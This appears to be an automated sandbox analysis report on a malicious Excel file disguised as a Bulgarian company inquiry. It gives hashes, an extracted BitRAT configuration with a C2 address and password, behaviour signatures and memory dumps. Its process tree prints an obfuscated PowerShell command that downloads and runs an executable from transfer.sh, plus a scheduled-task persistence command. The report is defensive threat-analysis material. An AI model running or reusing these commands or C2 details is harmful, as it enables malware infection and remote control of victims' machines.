Analysis

  • max time kernel
    35s
  • max time network
    76s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2023 15:55

General

  • Target

    Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls

  • Size

    100KB

  • MD5

    55e0c24ad93d53e9a161d813f09d9e9a

  • SHA1

    e3b6b703b99801b32a4c9754d591383dc30432bb

  • SHA256

    c1f218a24f82946584e59d64abc9762e85614803fe82c432d21678d1ae000db5

  • SHA512

    55127c6cbb0a7120f86378feb4057ccfc5341b22f902fffd14121cde404002de6422ebc5b346ae8ea8967d458d4581c68f7ae97d6b0ff85ad10d38aa38071375

  • SSDEEP

    3072:QrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnADtJE2zuxq+fr9wBLa71ba2ryLTHeYR:2xEtjPOtioVjDGUU1qfDlavx+W2QnApF

Score
10/10

Malware Config

Extracted

Family

bitrat

Version

1.38

C2

185.225.75.68:3569

Attributes
  • communication_password

    0edcbe7d888380c49e7d1dcf67b6ea6e

  • tor_process

    tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Zapitvane_MACH_BULGARIA_EOOD_09_2023.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4044
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/YeTYSYp0DR/abe.e^xe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell /W 01 curl https://transfer.sh/get/YeTYSYp0DR/abe.exe -o C:\Users\Public\gg1c8.exe;C:\Users\Public\gg1c8.exe
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4788
        • C:\Users\Public\gg1c8.exe
          "C:\Users\Public\gg1c8.exe"
          4⤵
          • Executes dropped EXE
          PID:1400
          • C:\Users\Public\gg1c8.exe
            "C:\Users\Public\gg1c8.exe"
            5⤵
              PID:4896
            • C:\Windows\SysWOW64\cmd.exe
              "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\state"
              5⤵
                PID:4560
              • C:\Windows\SysWOW64\cmd.exe
                "cmd" /c copy "C:\Users\Public\gg1c8.exe" "C:\Users\Admin\AppData\Roaming\state\state.exe"
                5⤵
                  PID:4968
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
                  5⤵
                    PID:2804
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\state\state.exe'" /f
                      6⤵
                      • Creates scheduled task(s)
                      PID:3100
          • C:\Users\Admin\AppData\Roaming\state\state.exe
            C:\Users\Admin\AppData\Roaming\state\state.exe
            1⤵
              PID:2540

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pi04gnw3.clu.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            • C:\Users\Admin\AppData\Roaming\state\state.exe
              Filesize

              5.1MB

              MD5

              9daa57b489fa4ac920cdbf09d018b7f0

              SHA1

              7de4586c966abb51b791c419d85d5663ea0307b6

              SHA256

              e2cee7a8fe833038806509be596a07b3082c3e38ddae66caa6275764d8420e3c

              SHA512

              f98f4c2600a1810e999756008235e194d43cea8d5e6d38a61f918882051649cdddd839610b87824aa888ecdec41ac0246bf212c298237ee18486cbd82d2fa48e

            • C:\Users\Admin\AppData\Roaming\state\state.exe
              Filesize

              704KB

              MD5

              ab4675807c04c9672354566e6c59e99c

              SHA1

              38abaea585e0ebfc2b3a14267710c1399e62a0e2

              SHA256

              0a57706d669d73f8d535a07bd9e6e0844d144da5b5eb533a01bb1110dd2107d9

              SHA512

              468cd7617d5ae038ba8c982856d9e4abe6960e8bccf9b0870d82c5ecad8821f3e0565cb5b8d041aeafe28a6d61e74b4977d24ecebbaa63874fa0fc6bd1dd02d7

            • C:\Users\Admin\AppData\Roaming\state\state.exe
              Filesize

              320KB

              MD5

              d88640393691701dca699d72a5fb85bd

              SHA1

              fc9f207647128af2a6f7257dfd5061abdd23275e

              SHA256

              2ae1a804de3ca02cf1e6a249d614f2ad73d51adc478d993e19436068e5dc26ec

              SHA512

              3ab03c7a089026bd7f78a49a9c30a046ed4959d20fcf9cb63a2b00e2bd51f073b4e25450d663417c50ea3814ab38619df14cd39225a3d1c208483633bba2410b

            • C:\Users\Public\gg1c8.exe
              Filesize

              7.6MB

              MD5

              18e07c4772a2687ee06a434ffef9572f

              SHA1

              ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

              SHA256

              ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

              SHA512

              8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

            • C:\Users\Public\gg1c8.exe
              Filesize

              7.6MB

              MD5

              18e07c4772a2687ee06a434ffef9572f

              SHA1

              ff1a7e4f53efdbd0935bcf8a8dac338ea96c9dbe

              SHA256

              ef509cb0a60d929e4f0acd3696e724397dc8113170df0ef478ea2afaae7800d8

              SHA512

              8795a49d7c5993f24a290e9d5f9299871af4ffd51a66b0656bf0057cdc15b1286350aae55be7b69cec660df1353f5a4dffdc08004a1b447b1b75e5645ac6188b

            • C:\Users\Public\gg1c8.exe
              Filesize

              5.7MB

              MD5

              c6236e0ca5d84121cbe590056136e459

              SHA1

              b3ca1ac673e4cfcdf3a9d10d6386c3d54107ac2b

              SHA256

              c692927a50291d39308cb575f6bd1eae1f438740902d4a624b01df99eccf0f7f

              SHA512

              a199e68bbb45f14e636bf928595faae5c55a0ee7b9b617ce884293b49b8407e2f70fa30a62c9d8762f12ec823622b918c27b47d0426e92424a085ad80d02e432

            • memory/1400-73-0x0000000007350000-0x0000000007ADA000-memory.dmp
              Filesize

              7.5MB

            • memory/1400-72-0x00000000057E0000-0x00000000057F0000-memory.dmp
              Filesize

              64KB

            • memory/1400-71-0x0000000005DA0000-0x0000000006344000-memory.dmp
              Filesize

              5.6MB

            • memory/1400-70-0x0000000000690000-0x0000000000E2E000-memory.dmp
              Filesize

              7.6MB

            • memory/1400-69-0x00000000746D0000-0x0000000074E80000-memory.dmp
              Filesize

              7.7MB

            • memory/1400-80-0x00000000746D0000-0x0000000074E80000-memory.dmp
              Filesize

              7.7MB

            • memory/2540-94-0x0000000073CD0000-0x0000000074480000-memory.dmp
              Filesize

              7.7MB

            • memory/4044-16-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-14-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-0-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
              Filesize

              64KB

            • memory/4044-17-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-18-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-19-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-20-0x00007FFBEE850000-0x00007FFBEE860000-memory.dmp
              Filesize

              64KB

            • memory/4044-26-0x000001908CD00000-0x000001908D500000-memory.dmp
              Filesize

              8.0MB

            • memory/4044-29-0x000001908CD00000-0x000001908D500000-memory.dmp
              Filesize

              8.0MB

            • memory/4044-30-0x000001908CD00000-0x000001908D500000-memory.dmp
              Filesize

              8.0MB

            • memory/4044-31-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-33-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-34-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-35-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-2-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-10-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-46-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-47-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-1-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
              Filesize

              64KB

            • memory/4044-4-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-3-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
              Filesize

              64KB

            • memory/4044-5-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
              Filesize

              64KB

            • memory/4044-52-0x000001908CD00000-0x000001908D500000-memory.dmp
              Filesize

              8.0MB

            • memory/4044-53-0x000001908CD00000-0x000001908D500000-memory.dmp
              Filesize

              8.0MB

            • memory/4044-6-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-8-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-15-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-7-0x00007FFBF0D90000-0x00007FFBF0DA0000-memory.dmp
              Filesize

              64KB

            • memory/4044-13-0x00007FFBEE850000-0x00007FFBEE860000-memory.dmp
              Filesize

              64KB

            • memory/4044-12-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-9-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4044-11-0x00007FFC30D10000-0x00007FFC30F05000-memory.dmp
              Filesize

              2.0MB

            • memory/4788-58-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4788-51-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4788-59-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4788-57-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4788-45-0x000001AC214B0000-0x000001AC214D2000-memory.dmp
              Filesize

              136KB

            • memory/4788-48-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
              Filesize

              10.8MB

            • memory/4788-56-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
              Filesize

              10.8MB

            • memory/4788-49-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4788-68-0x00007FFC083F0000-0x00007FFC08EB1000-memory.dmp
              Filesize

              10.8MB

            • memory/4788-50-0x000001AC214F0000-0x000001AC21500000-memory.dmp
              Filesize

              64KB

            • memory/4896-84-0x00000000745E0000-0x0000000074619000-memory.dmp
              Filesize

              228KB

            • memory/4896-79-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-86-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-85-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-87-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-88-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-89-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-74-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-77-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-90-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB

            • memory/4896-76-0x0000000000400000-0x00000000007CE000-memory.dmp
              Filesize

              3.8MB